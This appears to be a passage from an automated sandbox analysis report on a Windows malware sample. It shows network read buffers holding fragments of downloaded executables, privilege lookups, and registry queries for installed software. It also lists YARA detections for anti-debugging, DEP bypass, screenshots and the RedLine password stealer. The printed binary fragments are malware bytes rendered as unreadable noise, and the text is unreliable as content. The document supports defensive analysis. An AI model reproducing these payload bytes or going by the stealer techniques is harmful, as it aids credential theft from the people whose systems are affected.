þÿÿèÇEøõ§àªÇEüË9yUEøMü0ÿÿÿ4ÿÿÿÇEøor6ÇEüÊEøMü8ÿÿÿ<ÿÿÿÇEø6íÇEüÍcrEøMü@ÿÿÿDÿÿÿÇEøßoÿÇEü§XdEøMüHÿÿÿLÿÿÿÇEøu3¯DÇEüÏÐHTEøMüPÿÿÿTÿÿÿÇEø¦§ÇEüZm;1EøMüXÿÿÿ\ÿÿÿÇEø¥ÔöÇEü»K3EøMüÇEøEÇEüõrõEÀEøMÄMüÇEøWëêÇEüqEÈEøMÌMüÇEø°úÇEüÔµ EÐEøMÔMüÇEø3¯DÇEüÏÐHTEØEøMÜMüÇEø¦§ÇEüZm;1EàEøMäMü(0ÿÿÿWMÀEèMì)0ÿÿÿ(@ÿÿÿ0ÿÿÿWMÐQ)@ÿÿÿWÀ(PÿÿÿWMà)Pÿÿÿ¸þÿÿÇÈþÿÿÇÌþÿÿAÀuù+Ê0ÿÿÿQP¸þÿÿè¼ÇEøõ§àÝWÀÇEü3{_EøMüMEÇEøEÇEüõrõEøMüMEÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(MMìMEèQWMà)M)ÐþÿÿÇàþÿÿÇäþÿÿ@AÀuù+ÊEQPÐþÿÿèÇEøõ§àÝÇEüç;d\EøMüÿÿÿÿÿÿÇEø`w ÇEüå©EøMüÿÿÿÿÿÿÇEø1ôÇEüå^rEøMüÿÿÿÿÿÿÇEøÓuåÇEü ÆqEøMüÿÿÿÿÿÿÇEøt_¯DÇEüÏÐHTEøMü ÿÿÿ$ÿÿÿÇEø¦§ÇEüZm;1EøMü(ÿÿÿ,ÿÿÿÇEø¥ÔöÇEü»K3EøMüÇEøEÇEüõrõEÀEøMÄMüÇEøWëêÇEüqEÈEøMÌMüÇEø°úÇEüÔµ EÐEøMÔMüÇEø3¯DÇEüÏÐHTEØEøMÜMüÇEø¦§ÇEüZm;1EàEøMäMü request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà d`j@ À`í@Á ¢´À\|î°T@ .textcd `.dataHh@À.idataR j@@.rsrcðÀð\|@@.reloc° l@B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $j}¼¹.Òê.Òê.ÒêedÑë+Òêed×ëÒê;cÖë?Òê;cÑë$Òê;c×ëuÒêedÖë<ÒêedÔë/ÒêedÓë%Òê.Óê¤ÒêÛë<Òê-ê/ÒêÐë/ÒêRich.ÒêPEdùý;eð"%>ô @)Q`,¨<0T1ð$p àa8b( `@P.text¾<> `.rdatabbPdB@@.data¼,À¦@À.pdata$ð$º@@_RDATA\ Þ@@.rsrcT102à@@.reloc p @BHì(HµäIÇÀÿÿÿÿIÿÀB<uöH íÛèH!H Ñ4HÄ(é{ÌÌÌÌÌÌÌÌ@SHì`HS°H3ÄHD$XfoÓOfo +PfoPÇD$P§¾¡eH%XHº` »8HÙ¨uUÈ ÆC4HC3HL$SH;ÙwHL$ H;ÁrKS D$PC0ëKS D$PC0H ü4èÿwHËèTWÀ´ÚWÉó ¹ÚIÇÀÿÿÿÿfIÿÀB<uöHÓH ÚèG H @4èzHL$XH3ÌènvHÄ`[ÃÌÌÌÌÌÌÌÌHì(è''HÈè/SWÀWÉÚIÇÀÿÿÿÿó ÚIÿÀB<uöHÑH \Úè×H p4HÄ(ézÌÌÌÌÌÌÌHì(è·'HÈèÏQWÀWÉÚIÇÀÿÿÿÿó ÚIÿÀB<uöHÑH ÜÙèwH °4HÄ(é¯yÌÌÌÌÌÌÌHì(HIÇÀÿÿÿÿIÿÀB<uöH ]Úè8H Q6HÄ(épyÌÌÌÌÌÌÌÌ@SHì`HC®H3ÄHD$XfoÃMfo NfoNÇD$P§¾¡eH%XHº »`HÙ¨uUÈ ÆC4HC3HL$SH;ÙwHL$ H;ÁrKS D$PC0ëKS D$PC0H \|6èïuHËèRWÀ$ÙWÉó )ÙIÇÀÿÿÿÿfIÿÀB<uöHÓH üØè7H À5èsxHL$XH3Ìè^tHÄ`[ÃÌÌÌÌÌÌÌÌHì(è_HÈèQWÀWÉòØIÇÀÿÿÿÿó óØIÿÀB<uöHÑH ÌØèÇH ð5HÄ(éÿwÌÌÌÌÌÌÌ@SHì`HÓ¬H3ÄHD$XfoSKfo {Kfo£KÇD$P0û®§fÇD$T IeH%XHºÔ »ØHÙ¨ugÈ ÆC6HC5HL$UH;Ùw'HL$ H;ÁrKS D$PC0·D$TfC4ëKS D$PC0·D$TfC4H 36èftHËèå^WÀ»×WÉó À×IÇÀÿÿÿÿfIÿÀB<uöHÓH ×è§H p5èãvHL$XH3ÌèÎrHÄ`[ÃHì(H í½è`_H Ý5HÄ(é°vH 56é¤vH Í5évHì(A¹Hï¿E3ÀH u¿èRH =6HÄ(éhv@SHì ¹èì÷H ¹¿HØèÁH2BE3ÀHÓH¿H ¿èJH B6HÄ [évH ¿H¿HÂHcHHxÂHDPHä¾HcHLÃÌÌHì(H ½¾èp^H õ5HÄ(éÀuHì(A¹H§ÀE3ÀH -Àè¸QH Ñ5HÄ(éu@SHì ¹è÷H qÀHØèéHZAE3ÀHÓHUÀH NÀè¹IH Ö5HÄ [é@uH±ÁLº¿L«ÁHÒtHHcHLDPLÁHÁHÒtHHcHLDPÃÌÌHì(H e¿è]H y5HÄ(éØtHì(H Áèh]H ¥5HÄ(é¸tH U5é¬tÌÌÌÌH 5étÌÌÌÌHIÔÃÌÌÌÌÌÌÌÌ@SHì HÙHÂH =WÀHSHHHèwHÃHÄ [ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQH-ÜHÒHEÂÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHì H'=HùHÚHÁè®öÃt ºHÏèpH\$0HÇHÄ _ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHá<HHÁémÌÌÌÌÌÌÌÌÌÌÌÌÌH¹ÛHÇAHAH6=HHÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌHìHHL$ èÂÿÿÿHËHL$ èÅÌ@SHì HÙHÂH e<WÀHSHHHèWHÐ<HHÃHÄ [ÃÌÌÌÌ@SHì HÙHÂH %<WÀHSHHHèH <HHÃHÄ [ÃÌÌÌÌHì(H ýÚèH]ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ@SHì@H£§H3ÄHD$0LÂÆD$(HQLD$ H«;HÙHWÀHL$ èHþ;HHÃHL$0H3ÌècnHÄ@[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌ@SHì HÙHÂH U;WÀHSHHHèGH¨;HHÃHÄ [ÃÌÌÌÌDHÂHJÃÌÌÌÌÌ@SHì0HIØDÂHT$ ÿPHKLHHQI9Qu9u°HÄ0[Ã2ÀHÄ0[ÃÌHBLHL9IuD9u°Ã2ÀÃÌÌÌÌÌÌÌH²HAHÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ@SVWHì°)´$ HV¦H3ÄH$HòHÙH$IÐHL$`è0 HøH$6HxtA¸HVÙHÈèÖHNHfA~ðHT$@ÿPHT$@H\|$XHCT$@LD$PHÏè£HT$XHúr2HÿÂHL$@HÁHúrHÂ'HIøH+ÁHÀøHøùèÅlWÀD$ WÉóL$0D$ OL$0HÇGHÇGÆHD$ H\|$8HCD$ H p9HHSWÀH$Æ$H$èNH¯9HHT$8Húr.HÿÂHL$ HÁHúrHÂ'HIøH+ÁHÀøHøw9èlH¬:HsHÃH$H3ÌèÊk(´$ HÄ°_^[Ãè~ßè request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd=Ì:eð.nW @ ÀW`@@ WV H.text¤lW nW `.rsrcV WpW@@H@`Wd,@LþW((( &~þ~.s( Fo rp(! &~þ~&~þ~.þ (# Nþ þ þ ($ :þ þ o% &~ þ~ (0 .þ (1 .þ (2 .þ (3 (4 >þ þ (- .þ (5 þ o6 þ o7 .þ (8 þ o9 .þ (: *þ o &~þ~&~þ~.þ (G Jþ þ þ oH þ oI þ oJ .þ ((K &~þ~~*j(Crmp~(Dt&~þ~(=Jþ þ þ oN (G&~þ~0£ þ8þEo2Y8j\|(+ ~{B:Äÿÿÿ& 8¹ÿÿÿ} ~{#:ÿÿÿ& 8ÿÿÿ(} 8\|ÿÿÿ\|( 0/( }}\|(+\|( 0Î þ8þEoD8} 8Ðÿÿÿ\|(+ ~{G:®ÿÿÿ& 8£ÿÿÿ(} ~{j:ÿÿÿ& 8xÿÿÿ} ~{R:\ÿÿÿ& 8Qÿÿÿ\|( 0z þ8þE108,(o ~{:Êÿÿÿ& 8¿ÿÿÿ( ~{0:£ÿÿÿ& 8ÿÿÿ0O þ8þE/8(@} ~{+:Ïÿÿÿ& 8Äÿÿÿ0i þ8þEI8DÐ'({r%p((+(& ~{K:µÿÿÿ& 8ªÿÿÿ05 þ8þEÐã/Ñ8Ë\|(& ~{/9Ãÿÿÿ& 8¸ÿÿÿ& ~{c9& 8þE%Ü8 ~{d:Õÿÿÿ& 8Êÿÿÿ:ò 8þEWSÜ µ2^HDiñ°~íÍ8R(& 8ÿÿÿ{X} ~{z:rÿÿÿ& 8gÿÿÿ8¤ 8Xÿÿÿ} þ8>ÿÿÿ:° ~{E9& 8þ E0«jLFcyÒö8+\|þ ~{H9ÿÿÿ& 8ÿÿÿ (' 9' 8yÿÿÿ8Ì ~{x:`ÿÿÿ& 8Uÿÿÿ8 8Fÿÿÿ } 84ÿÿÿ ( 8#ÿÿÿ8 8ÿÿÿ{ ~{V9øþÿÿ& 8íþÿÿÝ- ~{>9Ôþÿÿ& 8Éþÿÿ%} ~{w:«þÿÿ& 8 þÿÿ\| (+ ~{I9~þÿÿ& 8sþÿÿ (%=3 8\þÿÿ%} ~{(:>þÿÿ& 83þÿÿs{u(&%('~%98&~þ s) %(+(+}þs, ((() ~{C:³ýÿÿ& 8¨ýÿÿÝ&ýÿÿ& ~{X:& 8þE8Ýïüÿÿ 8yüÿÿ(!("& ~{?:Xüÿÿ& 8Müÿÿ ~{g98üÿÿ& 8-üÿÿ} 8üÿÿ( ~{(9üÿÿ& 8öûÿÿ9uÿÿÿ ~{L:Úûÿÿ& 8Ïûÿÿ} 8¾ûÿÿ{ {£& 8¡ûÿÿ( 8ûÿÿ(:áÿÿÿ ~{y9nûÿÿ& 8cûÿÿ8c 8Tûÿÿ(!(- (#($ ~{`:ûÿÿ& 8ûÿÿ8Âûÿÿ ~{=:ûÿÿ& 8ûúÿÿ{{ i<ÿÿÿ 8Þúÿÿ8þÿÿ ~{z:Åúÿÿ& 8ºúÿÿÝV& ~{{9& 8þE8Ý ~{$:úÿÿ& 8úÿÿÝ ~{l:& 8þEC8\|(. 8Óÿÿÿþ} ~{c:·ÿÿÿ& 8¬ÿÿÿÝ 8ùÿÿ{ 8ùÿÿþ} ~{G9èøÿÿ& 8ÝøÿÿAL7¸`7[s~+0P þ8þE08+\|(/ ~{W:Îÿÿÿ& 8Ãÿÿÿ*0V þ8þEèRÿ,8ãþ} ~{>:Âÿÿÿ& 8·ÿÿÿ} ~ request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¶Õ×tOÕ×tOÕ×tO¿pNÇ×tO¿wNÞ×tO¿qNe×tOºqN×tOºpNÚ×tOºwNÜ×tO¿uNØ×tOÕ×uO×tON¹}NÑ×tON¹tNÔ×tON¹OÔ×tON¹vNÔ×tORichÕ×tOPEd /eð" rêÀ`%Xh%øÐØ¢ MpNà.textÈpr `.rdataº©ªv@@.data@> @À.pdataØ¢Ð¤^@@_RDATA@@.rsrcø@@.reloc @BHì(A¸ H''H [èH JHÄ(éÿÌÌÌHì(A¸ H'H °_ècH LJHÄ(éÏÌÌÌHì(A¸H'H ``è3H JHÄ(éÌÌÌHì(A¸ Hï&H p[èH ÌJHÄ(éoÌÌÌHì(A¸Hç&H à^èÓ~H KHÄ(é?ÌÌÌHì(A¸HÏ&H Yè£~H LKHÄ(éÌÌÌHì(E3ÀH¢H c_èv~H KHÄ(éâÌÌÌÌÌÌHì(E3ÀHrH _èF~H ÏKHÄ(é²ÌÌÌÌÌÌHì(E3ÀHBH £Zè~H LHÄ(éÌÌÌÌÌÌHì(E3ÀHH Xèæ}H OLHÄ(éRÌÌÌÌÌÌHì(A¸Hÿ%H àXè³}H LHÄ(éÌÌÌHì(A¸Hß%H °`è}H ÌLHÄ(éïÌÌÌHì(A¸H¿%H ^èS}H MHÄ(é¿ÌÌÌHì(A¸H%H pWè#}H LMHÄ(éÌÌÌHì(A¸H%H Yèó\|H MHÄ(é_ÌÌÌHì(A¸Ho%H [èÃ\|H ÌMHÄ(é/ÌÌÌHì(A¸HO%H [è\|H NHÄ(éÿÌÌÌHì(A¸H+%H pYèc\|H LNHÄ(éÏÌÌÌHì(A¸H%H @Zè3\|H NHÄ(éÌÌÌHì(A¸Hï$H ð[è\|H ÌNHÄ(éoÌÌÌHì(A¸HÏ$H \èÓ{H OHÄ(é?ÌÌÌHì(A¸LH¯$H ÐXè£{H LOHÄ(éÌÌÌHì(A¸HÏ$H Vès{H OHÄ(éßÌÌÌHì(A¸dH¿$H 0^èC{H ÌOHÄ(é¯ÌÌÌHì(A¸H÷$H \è{H PHÄ(éÌÌÌHì(A¸Hß$H PZèãzH LPHÄ(éOÌÌÌHì(A¸HÏ$H Uè³zH PHÄ(éÌÌÌHì(A¸H¯$H ðZèzH ÌPHÄ(éïÿÌÌÌHì(A¸(H$H `YèSzH QHÄ(é¿ÿÌÌÌHì(A¸H$H \è#zH LQHÄ(éÿÌÌÌHì(A¸Ho$H ^èóyH QHÄ(é_ÿÌÌÌHì(A¸HO$H PZèÃyH ÌQHÄ(é/ÿÌÌÌHì(A¸H/$H À[èyH RHÄ(éÿþÌÌÌHì(A¸H$H WècyH LRHÄ(éÏþÌÌÌHì(A¸,Hÿ#H ÀWè3yH RHÄ(éþÌÌÌHì(A¸Hÿ#H ÐVèyH ÌRHÄ(éoþÌÌÌHì(A¸Hï#H ZèÓxH SHÄ(é?þÌÌÌHì(A¸$HÏ#H ðZè£xH LSHÄ(éþÌÌÌHì(A¸HÇ#H WèsxH SHÄ(éßýÌÌÌHì(A¸H¯#H pRèCxH ÌSHÄ(é¯ýÌÌÌHì(A¸H#H àWèxH THÄ(éýÌÌÌHì(A¸H#H ÐTèãwH LTHÄ(éOýÌÌÌHì(A¸ Ho#H ÀXè³wH THÄ(éýÌÌÌHì(A¸ Hg#H °UèwH ÌTHÄ(éïüÌÌÌHì(A¸Hÿ"H àRèSwH UHÄ(é¿üÌÌÌHì(A¸H/#H Uè#wH LUHÄ(éüÌÌÌHì(A¸H#H @RèóvH UHÄ(é_üÌÌÌHì(A¸H÷"H PYèÃvH ÌUHÄ(é/üÌÌÌHì(A¸LHH @UèvH VHÄ(éÿûÌÌÌHì(A¸H§"H 0UècvH LVHÄ(éÏûÌÌÌHì(A¸dH¯H àUè3vH VHÄ(éûÌÌÌHì(A¸HW"H YèvH ÌVHÄ(éoûÌÌÌHì(A¸H?"H àWèÓuH WHÄ(é?ûÌÌÌHì(A¸H'"H ðTè£uH LWHÄ(éûÌÌÌHì(A¸H"H RèsuH WHÄ(éßúÌÌÌHì(A¸Hß!H ðXèCuH ÌWHÄ(é¯úÌÌÌHì(A¸H·!H TèuH XHÄ(éúÌÌÌHì(A¸H!H pRèãtH LXHÄ(éOúÌÌÌHì(A¸Ho!H Pè³tH XHÄ(éúÌÌÌHì(A¸HO!H NètH ÌXHÄ(éïùÌÌÌHì(A¸H?!H TèStH YHÄ(é¿ùÌÌÌHì(A¸0H!H pWè#tH LYHÄ(éùÌÌÌHì(A¸H'!H `WèósH YHÄ(é_ùÌÌÌHì(A¸H!H ðWèÃsH ÌYHÄ(é/ùÌÌÌ request_handle: 0x00cc0018	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPEL /eà!Ðf à@@zÜzP°øÀÜÀnp0o@ H.text `.rdata@b d@@.datav@À.rsrcø°@@.relocÜÀ@Bj hèl¹pèOHh°è\SYÃÌÌÌj hm¹è/Hhè<SYÃÌÌÌjh0m¹ èHhpèSYÃÌÌÌjhHm¹¸èïGhÐèüRYÃÌÌÌjhem¹ÐèÏGh0èÜRYÃÌÌÌjhem¹èè¯Ghè¼RYÃÌÌÌjhem¹èGhðèRYÃÌÌÌjhem¹èoGhPè\|RYÃÌÌÌh°èmRYÃÌÌÌÌhè]RYÃÌÌÌÌhpèMRYÃÌÌÌÌj?hðm¹xèGhÐè,RYÃÌÌÌh°èRYÃÌÌÌÌhPè RYÃÌÌÌÌhðèýQYÃÌÌÌÌhèíQYÃÌÌÌÌh0èÝQYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPè[ÄÆ^]ÂÌÌÌI¸¼lÉEÁÃÌÌUìVñFÇÔ!PèC[ÄöEtjVèûMÄÆ^]ÂAÇÔ!Pè[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿh(zEôPèëZÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèBZÄÇ,"Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèZÄÇà!Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì}SVÙW]àÛ}0Ñ}HÇj/hhmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèþDjjjjhmÿ,!}MjCMjjjjjPQPE´ÿ0!}4M jCM jjjjQhmPE¸ÿ4!}LU8ÿuHCU8MÈ}ÜðRÿuØCMÈQVuÀÿ8!EüPhÿûÿÿPVÿ<!Ài}ü\ûÿÿÇEÇEPÆEfD@Éuù+ÂMPûÿÿPèDMüE9MÇE¬BM}QCEMPÇE°ÆEèæC}°U}MôC×Eø]¬+ÁMÄSR;Øw,}øuäCuäEôPè[jMÄ3uÀÄÆëÆE¼Mäÿu¼SèIG}E°ør+HÇùrüÁ#+ÇÀüøQWèKÄUúr,MBÁúrIüÂ#+ÁÀüødRQèÓJÄEüÆûÿÿEüPhÿûÿÿPVÿ<!Àþÿÿ]àV5@!ÿÖÿu¸ÿÖÿu´ÿÖEäUÜ¸ÆEäó~EôfÖCÇEôEøúr/MÈBÁúrIüÂ#+ÁÀüøÌRQè;JEøÄÇEØÇEÜÆEÈør.MäPÁúrIüÂ#+ÁÀüøRQèóIÄUÇEôÇEøÆEäúr,MBÁúrIüÂ#+ÁÀüø>RQèIÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøøRQègIÄULÇE0ÇE4ÆE úÇM8BÁú«IüÂ#+ÁÀüøªéjhemÇCÇCÆèMAUúr(MBÁúrIüÂ#+ÁÀüøwbRQèÑHÄU4ÇEÇEÆEúLÿÿÿM BÁú0ÿÿÿIüÂ#+ÁÀüøwéÿÿÿRQèHÄ_^Ã[å]Ãè nÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì<¹`SVW=@3öVhem3Ûè@ÿDCOãÿyKËÿÿÿCð¥¶ÑòæÿyNÎÿÿÿF¶ð¥ð¥ð¥Mà¶ð¥Âuø¶ÀjÇEðÇEô¶ð¥EÿEÿPÆEàè@Eàº`PMÈèvAðÄþ`t\| tùr.¡`AùrPüÁ#+ÂÀüøÔÂQPèdGÄÇpÇtÆ``ó~FfÖpÇFÇFÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøw_RQèñFÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøwRQè¯FÄÿtuøéoþÿÿ_^[å]ÃèÃlÌÌÌUìì<SVWùÇGÇGÆèþÿÿ¡t¾``ø»0Cò=DC0+Þ]øø¹`¡pCÊÁ;ð*3Mà2EÿEÿjPÇEðÇEôÆEàèN>Eà×PMÈèÀ?ØÄ;ûteOùr+AùrPüÁ#+ÂÀüøÍÂQPè¸EÄÇGÇGÆó~CfÖGÇCÇCÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøwiRQèVEÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøw'RQèEÄ¡tF`]øé¼þÿÿÇ_^[å]ÃèkÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ}4E SCE VWÿu0Mü¹HPè =}EÿuCE¹0Pèô<5X3Û=\fDÿð¥Ã¹HC H÷þ ð¤Cû\|Ô3ÿ3öð¥¶ð¤ø¶ÊùçÿyOÏÿÿÿGð¥ð¥Fð¥þ\|ÁuüÎèýÿÿUúr request_handle: 0x00cc0018	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Nov. 3, 2023, 6:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 6:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 3, 2023, 6:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (50 out of 61 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	RedLine stealer	rule	RedLine_Stealer_m_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context

Queries for potentially installed applications (50 out of 78 events)

Time & API	Arguments	Status
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000458 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: AddressBook base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: Connection Manager base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: EditPlus base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
